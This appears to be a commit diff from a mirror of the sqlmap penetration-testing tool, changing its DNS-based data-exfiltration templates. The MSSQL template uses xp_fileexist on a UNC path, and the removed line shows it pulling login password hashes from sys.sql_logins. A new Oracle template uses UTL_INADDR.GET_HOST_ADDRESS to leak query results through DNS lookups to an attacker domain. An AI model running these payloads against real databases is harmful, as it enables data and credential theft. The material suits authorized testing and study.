mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2025-12-06 12:41:30 +00:00
minor update
This commit is contained in:
@@ -1,5 +1,3 @@
|
|||||||
# Reference: http://www.defcon.org/images/defcon-15/dc15-presentations/dc-15-karlsson.pdf
|
|
||||||
|
|
||||||
DECLARE @host varchar(1024);
|
DECLARE @host varchar(1024);
|
||||||
SELECT @host = name + '-' + master.sys.fn_varbintohexstr(password_hash) + '.%DOMAIN%' FROM sys.sql_logins;
|
SELECT @host = (%QUERY%) + '.%DOMAIN%';
|
||||||
EXEC('xp_fileexist "\' + @host + 'c$boot.ini"');
|
EXEC('xp_fileexist "\' + @host + 'c$boot.ini"');
|
||||||
1
procs/oracle/dns_request.txt
Normal file
1
procs/oracle/dns_request.txt
Normal file
@@ -0,0 +1 @@
|
|||||||
|
SELECT UTL_INADDR.GET_HOST_ADDRESS((%QUERY%)||%DOMAIN%) FROM DUAL
|
||||||
Reference in New Issue
Block a user